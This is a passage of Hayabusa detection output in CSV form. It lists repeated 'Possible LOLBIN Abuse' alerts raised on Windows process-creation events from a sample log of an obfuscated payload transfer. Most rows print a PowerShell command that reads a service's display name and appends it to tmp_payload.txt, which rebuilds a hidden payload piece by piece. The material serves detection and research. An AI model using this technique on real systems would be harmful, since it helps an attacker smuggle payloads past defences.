Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x298 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x308 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:48.943 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:48.959 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:51.840 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:51.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:56.197 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:56.213 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:02.034 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:02.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:03.487 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:03.503 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:09.316 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:09.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 